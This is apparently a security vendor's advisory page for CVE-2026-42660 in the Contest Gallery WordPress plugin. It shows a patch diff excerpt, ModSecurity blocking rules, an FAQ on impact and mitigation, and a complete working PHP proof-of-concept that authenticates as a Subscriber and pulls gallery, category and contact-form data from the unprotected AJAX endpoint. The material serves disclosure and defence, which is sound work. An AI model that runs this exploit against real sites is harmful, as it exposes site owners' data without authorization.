+            $AllUploadsUsedText = contest_gal1ery_htmlentities_and_preg_replace($_POST['cgSellContainer']['AllUploadsUsedText']);
         }
+        $_POST = cg1l_sanitize_post($_POST);
+        $_POST['cgSellContainer']['AllUploadsUsedText'] = $AllUploadsUsedText;
+
+        cg_ecommerce_sale_conf();
+        die;
     }
 }
 // set for paypal sell --- END
@@ -1402,51 +1554,6 @@
     }
 }

-// deactivate paypal sale
-add_action( 'wp_ajax_post_cg_deactivate_ecommerce_sale', 'post_cg_deactivate_ecommerce_sale' );
-if(!function_exists('post_cg_deactivate_ecommerce_sale')){
-    function post_cg_deactivate_ecommerce_sale() {
-
-        $_POST = cg1l_sanitize_post($_POST);
-
-        contest_gal1ery_db_check();
-
-        $isBackendCall = true;
-        $isAjaxCall = true;
-
-        $isAjaxCategoriesCall = true;
-
-        global $wp_version;
-        $sanitize_textarea_field = ($wp_version<4.7) ? 'sanitize_text_field' : 'sanitiz

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-42660
# Blocks unauthenticated/non-admin AJAX requests to the vulnerable get_inputs endpoint
# This rule targets the specific AJAX action that leaks gallery configuration data
SecRule REQUEST_URI "@rx /wp-admin/admin-ajax\.php" "id:20260901,phase:2,deny,status:403,chain,msg:'CVE-2026-42660 Contest Gallery get_inputs exploitation attempt',severity:'CRITICAL',tag:'CVE-2026-42660',tag:'contest-gallery',tag:'wordpress'"
SecRule ARGS_POST:action "@streq post_cg_move_to_another_gallery_get_inputs" "chain"
SecRule REQUEST_HEADERS:Referer "@rx /wp-admin/" "t:none"

# Second rule blocks the move_to_another_gallery action without proper authorization
# This targets the AJAX action that allows moving entries between galleries
SecRule REQUEST_URI "@rx /wp-admin/admin-ajax\.php" "id:20260902,phase:2,deny,status:403,chain,msg:'CVE-2026-42660 Contest Gallery move_to_another_gallery exploitation attempt',severity:'CRITICAL',tag:'CVE-2026-42660',tag:'contest-gallery',tag:'wordpress'"
SecRule ARGS_POST:action "@streq post_cg_move_to_another_gallery" "chain"
SecRule REQUEST_HEADERS:Referer "@rx /wp-admin/" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-42660 - Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe <= 28.1.7 - Authenticated (Subscriber+) Sensitive Information Exposure

// Configuration - set these before running
$target_url = 'http://example.com'; // WordPress site URL (no trailing slash)
$username = 'subscriber';           // WordPress username with Subscriber role
$password = 'password';             // User password

// Step 1: Authenticate to WordPress and get cookies
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => 1
    ]),
    CURLOPT_HEADER => true,
    CURLOPT_NOBODY => false,
    CURLOPT_COOKIEJAR => '/tmp/cve_cookies.txt',
    CURLOPT_FOLLOWLOCATION => false,
    CURLOPT_SSL_VERIFYPEER => false
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 302 && $http_code !== 200) {
    die("Authentication failed (HTTP $http_code)");
}
echo "[+] Authenticated as $usernamen";

// Step 2: Exploit the get_inputs AJAX handler
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $ajax_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => [
        'action' => 'post_cg_move_to_another_gallery_get_inputs'
    ],
    CURLOPT_COOKIEFILE => '/tmp/cve_cookies.txt',
    CURLOPT_SSL_VERIFYPEER => false
]);
$ajax_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 200) {
    die("AJAX request failed (HTTP $http_code)");
}

$json = json_decode($ajax_response, true);
if (json_last_error() !== JSON_ERROR_NONE) {
    die("Failed to parse JSON response: " . json_last_error_msg());
}

// Check for successful data extraction
if (isset($json['success']) && $json['success'] === true) {
    $data = $json['data'];
    echo "[+] Successfully extracted sensitive data:n";
    echo "    - Gallery IDs found: " . count($data['galleryIDs']) . "n";
    echo "    - Categories by Gallery: " . count($data['allCategoriesByGalleryID']) . "n";
    echo "    - Contact forms by gallery: " . count($data['contact_forms_by_gallery_id']) . "nn";
    
    // Display first 5 gallery IDs as sample
    echo "[+] Sample Gallery IDs:n";
    $count = 0;
    foreach ($data['galleryIDs'] as $gallery) {
        if ($count >= 5) break;
        echo "    - Gallery ID: " . $gallery->id . "n";
        $count++;
    }
    
    // Display sample category data
    echo "n[+] Sample Category Data:n";
    $count = 0;
    foreach ($data['allCategoriesByGalleryID'] as $galleryId => $categories) {
        if ($count >= 3) break;
        echo "    Gallery $galleryId:n";
        foreach ($categories as $cat) {
            echo "        - Category ID: " . $cat['id'] . ", Name: " . $cat['name'] . "n";
        }
        $count++;
    }
} else {
    echo "[-] Exploit failed. Response:n";
    print_r($json);
}

// Cleanup
unlink('/tmp/cve_cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-42660?
Overview of the vulnerability
CVE-2026-42660 is a vulnerability in the Contest Gallery plugin for WordPress that allows authenticated attackers with Subscriber-level access to expose sensitive user and configuration data. This occurs due to missing authorization checks in AJAX handlers that process backend operations.
Who is affected by this vulnerability?
Identifying vulnerable users and versions
All users of the Contest Gallery plugin version 28.1.7 and earlier are affected. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to identify if the vulnerability exists
You can check your site’s version of the Contest Gallery plugin in the WordPress admin dashboard under ‘Plugins’. If you are running version 28.1.7 or earlier, your site is vulnerable to CVE-2026-42660.
How can I fix the vulnerability?
Updating the plugin to a secure version
To mitigate this vulnerability, update the Contest Gallery plugin to version 29.0.0 or later, where the issue has been patched. Regularly updating plugins is essential for maintaining site security.
What does the CVSS score of 4.3 indicate?
Understanding the severity level
The CVSS score of 4.3 indicates a medium severity level for this vulnerability. This means that while the risk is not critical, it is significant enough that administrators should take immediate action to mitigate potential exploitation.
What kind of sensitive information can be exposed?
Types of data at risk
Exploitation of this vulnerability can expose sensitive information such as gallery IDs, category structures, and contact form configurations. This data can be leveraged for further attacks or unauthorized modifications.
How does the proof of concept demonstrate the vulnerability?
Explaining the exploitation method
The proof of concept illustrates how an authenticated Subscriber can send a crafted POST request to the vulnerable AJAX endpoint, triggering the exposure of sensitive data. It shows the steps to authenticate and exploit the vulnerability to retrieve sensitive information.
What are the potential impacts of this vulnerability?
Consequences of exploitation
If exploited, this vulnerability can allow an attacker to enumerate gallery IDs and their associated configurations, potentially leading to unauthorized access to private galleries or data corruption by moving entries between galleries.
What precautions can I take to enhance security?
Best practices for WordPress security
In addition to updating vulnerable plugins, regularly review user roles and permissions, implement strong authentication methods, and monitor for unusual activity on your WordPress site to enhance overall security.
Is there a specific code path that is vulnerable?
Identifying the vulnerable code
Yes, the vulnerable code resides in the ‘ajax-functions-backend.php’ file, specifically in the functions ‘post_cg_move_to_another_gallery_get_inputs’ and ‘post_cg_move_to_another_gallery’, which lack proper authorization checks.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Contest Gallery plugin temporarily or restricting access to the WordPress admin area to prevent potential exploitation until you can apply the patch.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
Subscribe to security bulletins from WordPress and relevant plugin developers, and consider using security plugins that monitor vulnerabilities to stay informed about potential risks and necessary updates.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations